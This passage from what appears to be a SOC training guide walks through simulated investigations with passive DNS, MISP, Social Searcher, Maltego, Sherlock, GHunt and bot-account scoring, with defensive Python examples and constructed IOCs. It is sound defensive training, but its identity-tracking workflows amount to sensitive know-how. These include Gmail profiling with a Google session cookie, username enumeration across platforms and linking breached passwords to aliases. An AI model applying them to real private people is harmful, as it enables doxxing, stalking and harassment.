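The pivot in Steps 2 and 3 can be scripted. The block below is an added example, not code from the report or from CIRCL: it parses passive DNS records into a timeline and flags a domain whose earlier IPs appear on a threat feed even though its current IP looks clean. The records, the IPs and the feed entry are constructed for the scenario; the parser also accepts the newline-delimited, epoch-timestamped shape the live CIRCL API returns, which differs from the array shown above.

```python
"""Added example (not from the report): turn CIRCL Passive DNS records into a
resolution timeline and flag a domain whose past IPs match a threat feed.
The records and the bad-IP feed below are constructed for the scenario."""
import json
from datetime import date, datetime, timedelta, timezone

# Constructed pDNS data. The live CIRCL API returns newline-delimited JSON with
# epoch timestamps; the report's example shows an array with ISO dates and
# "present". The parser accepts both shapes.
SAMPLE_PDNS = """\
{"rrname": "accountupdate-mail.com", "rrtype": "A", "rdata": "203.0.113.10", "time_first": 1718409600, "time_last": 1718928000, "count": 42}
{"rrname": "accountupdate-mail.com", "rrtype": "A", "rdata": "198.51.100.77", "time_first": "2024-07-03", "time_last": "present", "count": 9}
{"rrname": "accountupdate-mail.com", "rrtype": "NS", "rdata": "ns1.example.net", "time_first": "2024-06-15", "time_last": "present", "count": 2}
"""

# Constructed stand-in for the MISP feed the report mentions.
KNOWN_BAD_IPS = {"203.0.113.10": "RedLine Stealer C2 (MISP feed, June 2024)"}


def to_date(value, today=None):
    """Normalise a pDNS timestamp: epoch int, ISO date string or 'present'."""
    today = today or date.today()
    if value == "present":
        return today
    if isinstance(value, (int, float)):
        return datetime.fromtimestamp(value, tz=timezone.utc).date()
    return date.fromisoformat(value)


def parse_pdns(raw, today=None):
    """Parse a JSON array or NDJSON body into records with real date objects."""
    raw = raw.strip()
    if raw.startswith("["):
        rows = json.loads(raw)
    else:
        rows = [json.loads(line) for line in raw.splitlines() if line.strip()]
    records = []
    for row in rows:
        records.append({
            "rrname": row["rrname"],
            "rrtype": row["rrtype"],
            "rdata": row["rdata"],
            "time_first": to_date(row["time_first"], today),
            "time_last": to_date(row["time_last"], today),
        })
    # Oldest first, so the list reads as a timeline.
    return sorted(records, key=lambda r: r["time_first"])


def assess_domain(raw, bad_ips, today=None, current_window_days=7):
    """Return the A-record timeline plus a verdict based on historical hits."""
    today = today or date.today()
    timeline = [r for r in parse_pdns(raw, today) if r["rrtype"] == "A"]
    cutoff = today - timedelta(days=current_window_days)
    current = [r["rdata"] for r in timeline if r["time_last"] >= cutoff]
    hits = {r["rdata"]: bad_ips[r["rdata"]] for r in timeline if r["rdata"] in bad_ips}
    # "Moved after being flagged": a bad IP in the history, but none of the IPs
    # seen in the current window is on the feed. That is the evasion pattern the
    # report describes, and it is a reason to block, not to trust.
    shifted = bool(hits) and bool(current) and not any(ip in bad_ips for ip in current)
    verdict = "block" if hits else ("monitor" if current else "no-data")
    return {
        "domain": timeline[0]["rrname"] if timeline else None,
        "timeline": [(r["rdata"], r["time_first"].isoformat(), r["time_last"].isoformat())
                     for r in timeline],
        "historical_bad": hits,
        "current_ips": current,
        "ip_shift_after_bad": shifted,
        "verdict": verdict,
    }


if __name__ == "__main__":
    result = assess_domain(SAMPLE_PDNS, KNOWN_BAD_IPS)
    for ip, first, last in result["timeline"]:
        print(f"{first} .. {last}  {ip}")
    print("verdict:", result["verdict"], "| shifted after flag:", result["ip_shift_after_bad"])
```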
Step 4: Analyst Decision and Remediation
Although the current IP appears benign, CIRCL Passive DNS reveals malicious history
linked to the domain.
Action Taken:
Step                         | Description
Domain Blocked               | Added to email and firewall blocklists
Historical C2 IP Investigated | Other domains found linked to same old IP
IOC Escalated                | Domain submitted to MISP with tag: “TTP: Fast-Flux”
Timeline Updated             | Attack timeline adjusted based on DNS resolution shifts
Step 5: Documentation and Threat Mapping
MITRE ATT&CK Mapping:
Technique ID | Technique Name                  | Reason
T1583.001    | Acquire Infrastructure: Domains | Malicious domain was registered and used in campaign
T1071.001    | Application Layer Protocol: Web | HTTP/S phishing link distribution
T1568.002    | Dynamic Resolution              | IP shifting used to evade detection (DNS fast-flux)
Threat Wiki Update:
• CIRCL Passive DNS entry added
• API usage documented for automation
• Playbook updated to always include passive DNS history lookup in phishing triage
MISP (MALWARE INFORMATION SHARING PLATFORM & THREAT SHARING)
MISP is an open-source threat intelligence platform that enables sharing of threat
indicators, malware data, TTPs and threat actor profiles between trusted organisations. It
also supports automation, correlation and contextual tagging of threat events.
Use Cases:
• Collect and correlate IOCs from internal incidents, external reports and peer
organisations.
• Share threat intelligence feeds with other SOCs, ISACs or CERTs.
• Enrich alerts with contextual data including MITRE ATT&CK mappings and threat
actor profiles.
• Automate ingestion of threat intel into detection systems like SIEM or EDR.
Practical Application: During a targeted phishing campaign, the SOC ingests shared
indicators from a trusted partner’s MISP instance. The data includes sender domains,
hashes of attachments and URLs used. These indicators are pushed to the mail
gateway and SIEM for proactive blocking and alerting.
Scenario Simulation: Collaborative Threat Intelligence and IOC Distribution Using
MISP
Context
Objective: Detect and respond to a targeted phishing campaign by ingesting threat data
from a trusted partner’s MISP instance and automatically integrating indicators into
internal security tools.
Tool: MISP Threat Intelligence Platform
Environment:
• SOC Platform: MISP v2.4 instance deployed internally
• Integration: Connected to SIEM (Splunk) and Mail Gateway (Proofpoint)
• Trust Community: Member of local ISAC and one private CERT
Step 1: Threat Detection and Sharing from Partner MISP Instance
Trigger:
An oil and gas company, part of the same ISAC, shares a MISP event tagged as TLP:AMBER
related to a targeted phishing campaign using fake job offer lures.
Shared Indicators:
• Sender Domain: recruitment-global[.]org
• Attachment Hash: d1f4c89c0c1f23f23841cbfc81f63ae2 (Excel dropper)
• Malicious URL: [Link]
• Observed Threat Actor: APT-C-99
• MITRE Tags: T1566.001 (Phishing via Email), T1204.002 (Malicious File)
Step 2: Ingestion and Correlation in Local MISP
Action:
• Open internal MISP instance
• Go to Sync Actions > Pull Events
• Sync event using organisation UUID of the trusted partner
• Review pulled event details
Result:
• Event successfully ingested
• All attributes (domain, hash, URL, actor, tags) preserved
• Automatically correlated with internal events based on matching URL seen in proxy
logs
Step 3: IOC Distribution and Automated Response
Automation Workflow:
1. Export Feed: MISP → SIEM (Splunk) → via REST API
2. Email Gateway: MISP → Proofpoint → Block sender domain + hash match on
attachment
3. EDR: Hash indicator ingested into Cortex XDR IOC list
Splunk Correlation Rule:
index=email_logs sender_domain="[Link]"
Action Taken:
System        | IOC Ingested  | Response Triggered
Splunk SIEM   | Domain + URL  | Alert on matching internal emails
Email Gateway | Domain + Hash | Block + Quarantine new emails
EDR/XDR       | Hash          | Block execution + alert endpoint
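The distribution step above can be driven from the pulled event itself. The block below is an added example, not the report's or MISP's own code: it reads an event in the shape of MISP's event JSON export, keeps only attributes marked to_ids, routes them to the three controls in the table, and records whether the event's TLP marking permits auto-blocking. The event is constructed for the scenario; the domain and MD5 are the report's values, the URL and IP are placeholders, and the routing table and TLP policy are assumptions to adapt.

```python
"""Added example (not the report's or MISP's code): route the attributes of a
pulled MISP event to the controls the report's workflow names (Splunk, mail
gateway, EDR), honouring to_ids and the event's TLP tag. The event below is
constructed in the shape of MISP's event JSON export."""
import json

# Which indicator types each control consumes (mirrors the report's table).
ROUTES = {
    "siem":         {"domain", "hostname", "url", "ip-dst", "ip-src"},
    "mail_gateway": {"domain", "hostname", "md5", "sha1", "sha256"},
    "edr":          {"md5", "sha1", "sha256"},
}
# Assumed policy: auto-blocking only for events carrying an explicit TLP marking.
AUTO_BLOCK_TLP = {"tlp:clear", "tlp:white", "tlp:green", "tlp:amber", "tlp:amber+strict"}

SAMPLE_EVENT = json.dumps({"Event": {
    "id": "1042",
    "info": "Targeted phishing campaign - fake job offer lures",
    "Tag": [{"name": "tlp:amber"},
            {"name": "misp-galaxy:mitre-attack-pattern=\"Phishing: Spearphishing Attachment - T1566.001\""}],
    "Attribute": [
        {"type": "domain", "category": "Network activity", "to_ids": True,
         "value": "recruitment-global.org"},
        {"type": "md5", "category": "Payload delivery", "to_ids": True,
         "value": "d1f4c89c0c1f23f23841cbfc81f63ae2", "comment": "Excel dropper"},
        {"type": "url", "category": "Network activity", "to_ids": True,
         "value": "http://recruitment-global.org/jobs/offer.xlsx"},  # placeholder URL
        {"type": "threat-actor", "category": "Attribution", "to_ids": False,
         "value": "APT-C-99"},
        {"type": "ip-dst", "category": "Network activity", "to_ids": False,
         "value": "203.0.113.45", "comment": "low confidence, not for blocking"},
    ],
}})


def event_tlp(event):
    """Return the event-level TLP tag (lowercased) or None if absent."""
    for tag in event.get("Tag", []):
        if tag["name"].lower().startswith("tlp:"):
            return tag["name"].lower()
    return None


def route_event(raw_json):
    """Return {control: [values]} for detection-grade attributes, plus policy info."""
    event = json.loads(raw_json)["Event"]
    tlp = event_tlp(event)
    routed = {name: [] for name in ROUTES}
    skipped = []
    for attr in event.get("Attribute", []):
        # to_ids is MISP's "usable for detection" flag; non-IDS context stays out
        # of blocklists even when the event is trusted.
        if not attr.get("to_ids"):
            skipped.append((attr["type"], attr["value"]))
            continue
        for control, types in ROUTES.items():
            if attr["type"] in types:
                routed[control].append(attr["value"])
    return {
        "event_id": event["id"],
        "tlp": tlp,
        "auto_block": tlp in AUTO_BLOCK_TLP,
        "routed": routed,
        "skipped": skipped,
    }


def splunk_search(domains, index="email_logs"):
    """Build the report's correlation search for one or more sender domains."""
    clauses = " OR ".join(f'sender_domain="{d}"' for d in domains)
    return f"index={index} ({clauses})" if len(domains) > 1 else f"index={index} {clauses}"


if __name__ == "__main__":
    plan = route_event(SAMPLE_EVENT)
    print(json.dumps(plan, indent=2))
    print(splunk_search([v for v in plan["routed"]["siem"] if "/" not in v]))
```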
Step 4: Contextual Threat Intelligence and Analyst Review
MISP Tag Enrichment:
• MITRE ATT&CK: T1566.001 (Phishing), T1204.002 (User Execution)
• Threat Actor: APT-C-99 (suspected spear phishing group)
• Malware: [Link]
Analyst Notes:
• Domain [Link] had previously been observed in Q1 campaigns
• Dropper file connects to C2 via HTTPS and performs initial reconnaissance
Step 5: Reporting, Documentation and Feedback Sharing
SOC Wiki Entry:
• Full breakdown of the phishing campaign added to internal wiki
• Included all IOCs, screenshots from phishing emails, behaviour of the dropper and
links to MISP event
Feedback to Partner:
• Used MISP Proposal function to suggest additional tagging: T1059 (Command &
Scripting Interpreter)
Dashboard Update:
• Monthly intel ingestion count increased by 15%
• Playbook updated to reflect auto-blocking policy for MISP-verified TLP:AMBER
events
10. SOCIAL MEDIA AND IDENTITY TRACKING
SOCIAL SEARCHER
Social Searcher is a real-time search engine for public social media content. It allows
users to search for keywords, usernames, hashtags and mentions across platforms like
Facebook, Twitter, Instagram, TikTok, LinkedIn and more.
Use Cases:
• Monitor for mentions of brand names, executives or confidential keywords across
social media.
• Detect impersonation attempts of corporate profiles or VIPs.
• Investigate leaked data, attack coordination or early indicators of planned
campaigns.
• Conduct reputation monitoring or digital risk protection (DRP).
Practical Application: A threat actor impersonates a company executive on Twitter.
Using Social Searcher, the SOC analyst identifies the fake account, collects
screenshots of messages targeting employees and reports the impersonation to the
platform for takedown.
Scenario Simulation: Executive Impersonation via Twitter
Objective: Detect and respond to impersonation of a corporate executive using Social
Searcher by monitoring social media mentions and fake accounts.
Tool: Social Searcher ([Link])
Context
• Company: Nexaware Cybersecurity Ltd
• Executive: Maria Lee, CISO
• Incident Trigger: A junior employee receives a suspicious DM from someone
claiming to be Maria Lee, asking for sensitive financial files
Step 1: Initial Analyst Response
Trigger:
Employee flags a message on Twitter from account: @Maria_NexawareCEO
Suspicious Message Screenshot:
"Hi, I need a copy of the latest Q3 budget file for an urgent board review. Please email it to
my personal address, [Link]@nexawareconsultant[.]pro"
Step 2: Search on Social Searcher
Action:
SOC Analyst logs into Social Searcher
Inputs keyword: Maria Nexaware
Filters by:
• Platform: Twitter
• Timeframe: Past 7 Days
• Result Type: All (posts, profiles, mentions)
Search Output
Top 3 Results:
Profile Handle          | Name / Content                                        | Type     | Notes
@Maria_NexawareCEO      | Maria Lee – Nexaware                                  | Profile  | Low follower count, joined 2 days ago
@MariaLee_Real          | Maria Lee                                             | Verified | Official CISO account
Tweet by @sec_insider24 | “Scammers pretending to be execs again. Watch out.”   | Post     | Links to @Maria_NexawareCEO
Additional Indicators:
• The fake account only posts messages asking for “urgent access”
• DMs multiple employees (pattern found by keyword budget file + Maria)
• Profile picture copied from LinkedIn
• Bio includes “CISO | Nexaware Ltd – Vision First”
Step 3: Confirm and Investigate Impersonation
Indicators of Impersonation:
• Recent account creation
• Copy-pasted corporate role
• No engagement history
• Pattern of phishing messages targeting internal staff
Triage Actions:
• Screenshots saved as evidence
• Compared account metadata with LinkedIn profile
• Analyst checks mentions via Social Searcher to confirm it's spreading
Step 4: Response Actions
Step | Action Description
1    | Analyst escalates to Security Awareness team
2    | Security team alerts all employees via email and internal comms
3    | SOC reports fake Twitter profile via Twitter impersonation form
4    | Domain nexawareconsultant[.]pro submitted to blocklist
5    | WHOIS lookup confirms domain registered 3 days ago via Namecheap
6    | Analyst adds indicators (fake account handle, domain) to internal threat intel feed
7    | A detection rule is created to monitor similar social media patterns in Social Searcher
Step 5: Documentation and Threat Mapping
MITRE ATT&CK Mapping:
Technique ID | Name                                      | Reason
T1585.001    | Establish Accounts: Social Media Accounts | Fake Twitter profile
T1566.002    | Phishing: Spearphishing via Service       | Direct messages to employees
T1589.003    | Gather Victim Identity Information        | Profile and email spoofing
IOC Summary:
Type    | Indicator                         | Description
Twitter | @Maria_NexawareCEO                | Impersonation account
Email   | [Link]@nexawareconsultant[.]pro   | Suspicious email address
Domain  | nexawareconsultant[.]pro          | Spoofed domain
Phrase  | “Q3 budget file”                  | Phishing lure
Step 6: Update Playbook and Automate Monitoring
Playbook Update:
• All VIP impersonation alerts must be run through Social Searcher
• SOC team will run keyword-based scheduled scans daily for:
o Executive names
o Company name + roles
o Domain spoof patterns
o Common phishing themes (e.g., "urgent", "wire transfer", "budget")
Example Automation:
Set up Social Searcher alerts for:
Query: ("Maria Lee" OR "Nexaware CISO") AND ("budget file" OR "urgent")
Frequency: Hourly
Platform: Twitter + LinkedIn
MALTEGO
Maltego is a powerful link analysis and data correlation tool used for mapping relationships
between people, domains, IPs, email addresses, phone numbers and social media
profiles. It integrates with OSINT databases and APIs to visualise connections across the
internet.
Use Cases:
• Investigate online identities and link them to social accounts, domains or
infrastructure.
• Map threat actor personas and digital footprints.
• Perform people-centric threat hunting, social engineering analysis or insider threat
investigations.
• Correlate email addresses and usernames to breached data and social profiles.
Practical Application: An attacker is using a Gmail address to target the company’s
support inbox. Maltego is used to identify other usernames and social profiles linked
to the same email, which reveals the attacker’s presence on multiple forums and their
connected infrastructure.
Scenario Simulation: Threat Actor Infrastructure Mapping Using Maltego
Objective: Trace a threat actor’s Gmail address used in targeted phishing emails and
uncover linked domains, usernames and social profiles.
Tool: Maltego (Community or Pro edition with standard OSINT transforms)
Context
• Trigger:
Security team receives multiple phishing emails from:
[Link]@[Link]
• Phishing Content:
Claims to be from the IT team asking users to reset passwords via a fake portal.
• Initial IOC:
Sender email: [Link]@[Link]
Step 1: Set Up Maltego Canvas
Action:
1. Launch Maltego
2. Create a new graph
3. Add a Person entity with alias: [Link]@[Link]
Step 2: Run Transforms
Transform Run 1: Email Address → Associated Usernames and Domains
• Transforms:
o To Domains using this Email
o To Social Profiles using this Email
o To Breached Credentials
Output:
Entity Type    | Entity                 | Details
Domain         | updates-pw-reset[.]com | Registered using this email
Username       | cyberdog187            | Found on data leak from RaidForums
Social Profile | Twitter: @cyberdog_187 | Profile mentions “infosec fan”
Breach Data    | P@ss1234               | Password reuse found on 3 breaches
Step 3: Expand Graph for Infrastructure Links
Transform Run 2: Domain → Infrastructure Analysis
1. Select updates-pw-reset[.]com
2. Run transforms:
o To WHOIS Info
o To Hosting IP
o To MX Records
o To DNS Records
o To SSL Certificates
Output:
Entity Type | Value                      | Notes
IP Address  | [Link]                     | Hosted on VPS provider in Ukraine
WHOIS Name  | Hidden via Privacy Protect | Common tactic by threat actors
SSL Cert CN | *.reset-login[.]online     | Another domain variant linked
Subdomain   | [Link]                     | Control panel access
Step 4: Identity Correlation
Transform Run 3: Username → Online Persona Discovery
• Selected username: cyberdog187
• Transforms:
o To Social Networks
o To Email Addresses
o To Domain Ownership
Findings:
Entity Type    | Detail
Telegram       | @cyberdog187_sec – active in hacktivist forums
GitHub         | Account linked, contains phishing templates
Pastebin       | Multiple pastes with mass email scripts and harvested credentials
Breached Email | cyberdog187@[Link]
Step 5: Threat Attribution & Summary
Findings Summary:
IOC                     | Category            | Notes
[Link]@[Link]           | Initial Email IOC   | Used in phishing attacks
cyberdog187             | Threat Actor Alias  | Found on dark web & social
updates-pw-reset[.]com  | Phishing Domain     | Linked via WHOIS and SSL
@cyberdog_187 (Twitter) | Impersonation       | Profile aligns with actor
[Link]                  | Hosting IP          | Shared across campaigns
*.reset-login[.]online  | Alternate Domain    | Common certificate linkage
MITRE ATT&CK Mapping:
Technique ID | Technique Name                          | Justification
T1585.001    | Establish Accounts: Email               | Gmail used for phishing
T1583.006    | Acquire Infrastructure: Web Domains     | Domains registered for phishing
T1566.002    | Phishing: Spearphishing via Service     | Email campaign targeting staff
T1589.002    | Gather Victim Identity: Email Addresses | Email harvesting observed
Step 6: Remediation Actions
Action Step             | Description
IOC Blocklisting        | All domains, email and IPs added to blocklists
Twitter Reporting       | Report @cyberdog_187 for impersonation
DNS Sinkhole Setup      | Sinkhole for updates-pw-reset[.]com
Threat Intel Enrichment | Data pushed to internal MISP instance
Detection Rule Update   | Regex patterns for pw-reset, login, [Link] in email filters
Team Briefing           | Incident summary shared for user awareness and response drills
Automation Potential
• API-based transform scheduling using Maltego Machines
• Export graph data into SOAR platform for response action
• Use Auto-Expand to explore new entities as they are detected over time
SHERLOCK
Sherlock is an open-source Python tool that checks for the availability of a given username
across hundreds of social media platforms and websites. It is commonly used to identify
user aliases and online identities.
Use Cases:
• Find all public profiles associated with a threat actor’s handle or alias.
• Trace cybercriminal activity across underground forums, chat platforms and public
services.
• Build a user profile during phishing, scam or harassment investigations.
• Link usernames to known leaks or persona infrastructure.
Practical Application: A scammer is using the alias “h4ck3r_malaysia” in phishing
campaigns. Using Sherlock, the SOC identifies the same username on GitHub,
Telegram, Reddit and Pastebin, some of which contain code samples and links to C2
infrastructure.
Scenario Simulation: User Alias Profiling with Sherlock
Objective: Identify a threat actor’s online presence using a known alias and correlate it
with malicious campaigns and infrastructure.
Tool: Sherlock (GitHub: [Link])
Context
• Trigger:
An internal phishing incident report includes a signature at the bottom of the
phishing email:
~ h4ck3r_malaysia
• Initial IOC:
Alias/Handle: h4ck3r_malaysia
Step 1: Tool Setup
Environment: Kali Linux or any system with Python 3 and Git installed
Installation Command:
git clone [Link]
cd sherlock
python3 -m pip install -r [Link]
Step 2: Run Sherlock with the Alias
Command:
python3 sherlock h4ck3r_malaysia
Sherlock will scan hundreds of platforms including GitHub, Telegram, Reddit, Pastebin,
TikTok and underground communities.
Step 3: Output
Platform   | URL Found                        | Notes
GitHub     | [Link]/h4ck3r_malaysia           | Repository titled phishing-kit-v2
Telegram   | [Link]/h4ck3r_malaysia           | Channel shares stolen credential dumps
Reddit     | [Link]/user/h4ck3r_malaysia      | Posts in r/hacking and r/OSINT
Pastebin   | [Link]/u/h4ck3r_malaysia         | Pastes contain credential logs
DeviantArt | [Link]/h4ck3r_malaysia           | Profile image used as phishing lure
Codeberg   | [Link]/h4ck3r_malaysia           | Repo hosting modified phishing pages
Step 4: Manual Review and Enrichment
GitHub Repository Review:
• Repository: phishing-kit-v2
• Files:
o [Link] contains hardcoded exfil email: maliciousreceiver@[Link]
o [Link] links to tutorial video hosted on vidfiles[.]pw
Telegram Channel Analysis:
• Last post: “200 MY emails from [Link] breach”
• Group linked to @darkmarket_malaysia
Pastebin Contents:
• Paste titles:
o Captured_Logins_2025_07_20.txt
o API_C2_Endpoints.txt
Step 5: Correlation and Infrastructure Discovery
From pastes and GitHub links, you discover the following new IOCs:
IOC Type | Value                    | Notes
Email    | maliciousreceiver@[Link] | Exfil destination
Domain   | vidfiles[.]pw            | Used in tutorial video
IP       | [Link]                   | Linked to GitHub-extracted C2
Cross-checking with VirusTotal and CIRCL Passive DNS reveals:
• vidfiles[.]pw previously used in malware campaigns
• [Link] has hosted other phishing kits
Step 6: Threat Actor Profile
Attribute       | Value
Alias           | h4ck3r_malaysia
Known Platforms | GitHub, Telegram, Reddit, Pastebin, DeviantArt
Infrastructure  | vidfiles[.]pw, [Link]
Tactics         | Phishing kits, credential harvesting, API-based exfiltration
Language Use    | Malay + English mix
Tools Shared    | PHP-based login cloners, free email grabbers
MITRE ATT&CK Mapping
Technique ID | Technique Name                      | Justification
T1585.001    | Establish Accounts: Social Media    | Alias found on multiple platforms
T1566.002    | Phishing: Spearphishing via Service | Kits and email lures confirmed
T1005        | Data from Local System              | Stolen credentials shared on Pastebin
T1589.001    | Gather Victim Identity: Credentials | Paste contains credential dumps
T1583.006    | Acquire Infrastructure: Web Domains | Used vidfiles[.]pw for exfil or lure
Remediation and Action Items
Action Item           | Description
IOC Blocklisting      | All linked domains, IPs and usernames submitted to blocklist
GitHub Abuse Report   | Report phishing-kit-v2 repo
Telegram Abuse Report | Report channel @h4ck3r_malaysia
TTP Documentation     | Add Sherlock-based persona mapping to incident playbook
Automation Task       | Incorporate Sherlock into social reconnaissance workflow for phishing investigations
GHUNT
GHunt is an OSINT tool focused on investigating Google accounts and Gmail addresses. It
provides metadata such as profile photos, calendar IDs, YouTube channels, Google Drive
files, phone verification status and Google Maps locations.
Use Cases:
• Investigate attackers or insiders using Gmail addresses.
• Identify related Google services connected to a specific account.
• Perform email fingerprinting to assess credibility and behavioural patterns.
• Detect potential fake Google accounts involved in phishing or impersonation.
Practical Application: During a business email compromise (BEC) attempt, the
attacker uses a Gmail account to pose as the CFO. GHunt reveals the account is
recently created, lacks any Google service activity and uses a stock photo as a profile
image, confirming it as fake.
Scenario Simulation: Gmail Account Profiling with GHunt
Objective: Verify the legitimacy of a Gmail account used in a suspected BEC attack by
profiling its connected Google services and metadata.
Tool: GHunt (GitHub: [Link])
Context
• Trigger:
A company finance executive reports receiving an internal payment request from a
Gmail account claiming to be the CFO.
• Suspicious Gmail Address:
[Link]@[Link]
Step 1: Tool Setup
Environment: Kali Linux or any Linux distro with Python
GHunt Installation:
git clone [Link]
cd GHunt
pip3 install -r [Link]
Initial Setup: GHunt requires a Google cookie (preferably SID, HSID, SSID) from a browser
session with Google. This cookie is needed to access user profile data.
Command to Configure Cookie:
python3 check_and_gen.py
Step 2: Run GHunt Against Target Gmail
Command:
python3 [Link] [Link]@[Link]
Step 3: GHunt Output
{
  "email": "[Link]@[Link]",
  "created": "2025-07-28",
  "name": "",
  "profile_pic": "[Link]",
  "google_services": {
    "YouTube": null,
    "Google Maps": null,
    "Google Drive": null,
    "Google Photos": null,
    "Calendar": null
  },
  "phone_verified": false,
  "location": null,
  "profile_status": "Minimal",
  "visibility": "Private"
}
Step 4: Analysis and Observations
Attribute            | Value       | Observation
Creation Date        | 2025-07-28  | Recently created
Profile Picture      | Stock photo | Not personalised
Google Services Used | None        | Suspicious inactivity
Phone Verified       | False       | No verified number
Profile Status       | Minimal     | Likely automation
Name Field           | Empty       | Not linked to real identity
This information strongly suggests the account is fraudulent and was created solely for the
purpose of impersonation.
Step 5: Correlation and Risk Assessment
The GHunt output is correlated with other alerts:
• Email headers show SPF and DKIM fail.
• Domain linked in the body (quickfiles-finance[.]com) was registered 2 days ago.
• The email used similar language and formatting to the real CFO’s past emails (likely
scraped).
Step 6: SOC Action Plan
Action Item                  | Description
Block Email Address          | Add to email gateway blocklist
Add Domain to Watchlist      | quickfiles-finance[.]com added to DNS monitoring
Alert Executives and Finance | Send security awareness alert
Report to Google Abuse       | Report fraudulent account to Google
Update TTP Database          | Document account creation pattern and fake Gmail tactics
Integrate GHunt in Workflow  | Add to BEC response playbook as initial verification step
MITRE ATT&CK Mapping
Technique ID | Technique Name                              | Reason
T1585.001    | Establish Accounts: Social Media / Web Email | Gmail account created for impersonation
T1566.001    | Phishing: Spearphishing via Email           | Targeted internal request
T1586        | Compromise Accounts                         | Attempt to pose as CFO
T1583.006    | Acquire Infrastructure: Email Accounts      | Used Gmail to bypass internal mail filters
ACCOUNT ANALYSIS
Account Analysis refers to the practice of manually or automatically assessing user
accounts across social platforms, forums and digital services to evaluate authenticity,
behaviour, connections and risk. It is often done using OSINT tools, custom scripts or
human expertise.
Use Cases:
• Assess whether a social media profile is legitimate, fake or part of a bot network.
• Analyse user posting behaviour, language, timezone, geolocation tags and image
metadata.
• Identify sock puppet accounts or coordinated influence operations.
• Evaluate risk associated with followers or contacts of key executives.
Practical Application: During a disinformation campaign, multiple social media
accounts spread false information about the organisation. Analysts perform account
analysis on the profiles, revealing that many share similar creation dates, post
patterns and reused photos, indicating they are part of a botnet or influence network.
Scenario Simulation: Coordinated Bot Account Detection During Disinformation
Campaign
Objective: Evaluate the authenticity and coordination level of multiple suspicious
accounts spreading misinformation about the organisation across social media.
Methodology: Manual and tool-assisted account profiling using OSINT principles.
Context
• Trigger:
A trending Twitter/X hashtag #CompanyXFraud starts circulating, damaging the
reputation of the organisation.
Several new accounts post nearly identical messages, tags and images.
• Suspicious Accounts:
@realfacts_truth
@whistle_truther
@insiderreports_
@verify_financials
Step 1: Data Collection
Tools:
• Twitter web search
• TweetDeck / Twint / X API (for automation)
• [Link] (snapshot posts)
• ExifTool (image metadata)
• Browser DevTools (headers, timestamps)
Actions:
• Download public profile data (bio, creation date, posts, followers).
• Screenshot and archive suspicious tweets.
• Collect any shared images or media.
Step 2: Manual Account Profiling
Account            | Created On | Followers | Following | Profile Pic Reuse | Posting Pattern               | Notes
@realfacts_truth   | 2025-07-15 | 4         | 1000+     | Stock image       | 30 tweets/day, 90% hashtag    | No replies or conversations
@whistle_truther   | 2025-07-15 | 6         | 800+      | Same stock image  | Same wording, same time       | All retweets of 2 accounts
@insiderreports_   | 2025-07-15 | 5         | 950+      | Different image   | Identical tweet format        | Linked to suspicious domain
@verify_financials | 2025-07-15 | 3         | 990       | Profile blank     | Retweets only                 | No bio or history
Findings:
• All accounts created on the same date.
• Follow similar accounts and post at near-identical times.
• Minimal organic interaction; followers inflated.
• Shared/reused media traced via reverse image search.
Step 3: Behavioural and Linguistic Pattern Matching
Analysis:
• All tweets use phrases like:
"Time to expose #CompanyXFraud. The public deserves truth."
Indicates scripted or automated behaviour.
• All posts made between 2AM–4AM GMT+8, inconsistent with Malaysia’s normal
business hours.
• Hashtags recycled across all accounts.
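The signals from Steps 2 and 3 (shared creation date, follower/following ratio, reused profile image, the 2–4 AM posting window and near-identical wording) lend themselves to a repeatable score. The block below is an added example, not part of the report: it applies those checks to a constructed set of account records modelled on the table above, plus one ordinary account as a control, and flags accounts that trip three or more signals. The thresholds are assumptions to tune against your own baseline.

```python
"""Added example (not from the report): score a set of social accounts for
coordination using the signals the profiling table lists. The account records
are constructed from the scenario, with one ordinary account as a control."""
from collections import Counter
from difflib import SequenceMatcher
import re

ACCOUNTS = [
    {"handle": "@realfacts_truth", "created": "2025-07-15", "followers": 4, "following": 1000,
     "image_hash": "img-A", "post_hours": [2, 3, 3, 4],
     "post": "Time to expose #CompanyXFraud. The public deserves truth."},
    {"handle": "@whistle_truther", "created": "2025-07-15", "followers": 6, "following": 800,
     "image_hash": "img-A", "post_hours": [2, 2, 3, 4],
     "post": "Time to expose #CompanyXFraud. The public deserves truth!!"},
    {"handle": "@insiderreports_", "created": "2025-07-15", "followers": 5, "following": 950,
     "image_hash": "img-B", "post_hours": [3, 3, 4, 4],
     "post": "Time to expose #CompanyXFraud. The public deserves the truth."},
    {"handle": "@verify_financials", "created": "2025-07-15", "followers": 3, "following": 990,
     "image_hash": None, "post_hours": [2, 3, 3, 3],
     "post": "RT: Time to expose #CompanyXFraud. The public deserves truth."},
    {"handle": "@genuine_user", "created": "2019-03-02", "followers": 420, "following": 310,
     "image_hash": "img-C", "post_hours": [9, 12, 18, 21],
     "post": "Anyone else seeing the #CompanyXFraud tag? Looks like a pile-on to me."},
]

# Thresholds are assumptions for this example; tune them to your own baseline.
MIN_CLUSTER = 3            # accounts sharing one creation date
MAX_RATIO = 0.05           # followers / following
OFF_HOURS = range(2, 5)    # 02:00-04:59 in the report's GMT+8 observation
MIN_OFF_HOURS_SHARE = 0.75
MIN_TEXT_SIMILARITY = 0.85
FLAG_AT = 3                # signals needed to flag an account


def normalise(text):
    """Lowercase, drop a leading RT marker and punctuation so templates compare cleanly."""
    text = re.sub(r"^rt:?\s*", "", text.strip().lower())
    return re.sub(r"[^a-z0-9#\s]", "", text)


def text_similarity(a, b):
    return SequenceMatcher(None, normalise(a), normalise(b)).ratio()


def score_accounts(accounts):
    """Return one result per account: its fired signals, score and flag."""
    created = Counter(a["created"] for a in accounts)
    images = Counter(a["image_hash"] for a in accounts if a["image_hash"])
    results = []
    for acc in accounts:
        signals = []
        if created[acc["created"]] >= MIN_CLUSTER:
            signals.append("creation_date_cluster")
        if acc["following"] and acc["followers"] / acc["following"] < MAX_RATIO:
            signals.append("low_follower_ratio")
        if acc["image_hash"] and images[acc["image_hash"]] > 1:
            signals.append("profile_image_reuse")
        hours = acc["post_hours"]
        if hours and sum(h in OFF_HOURS for h in hours) / len(hours) >= MIN_OFF_HOURS_SHARE:
            signals.append("off_hours_posting")
        peers = [o for o in accounts if o is not acc]
        if peers and max(text_similarity(acc["post"], o["post"]) for o in peers) >= MIN_TEXT_SIMILARITY:
            signals.append("templated_wording")
        results.append({"handle": acc["handle"], "signals": signals,
                        "score": len(signals), "flagged": len(signals) >= FLAG_AT})
    return results


def flagged_handles(accounts):
    return [r["handle"] for r in score_accounts(accounts) if r["flagged"]]


if __name__ == "__main__":
    for r in score_accounts(ACCOUNTS):
        mark = "FLAG" if r["flagged"] else "ok  "
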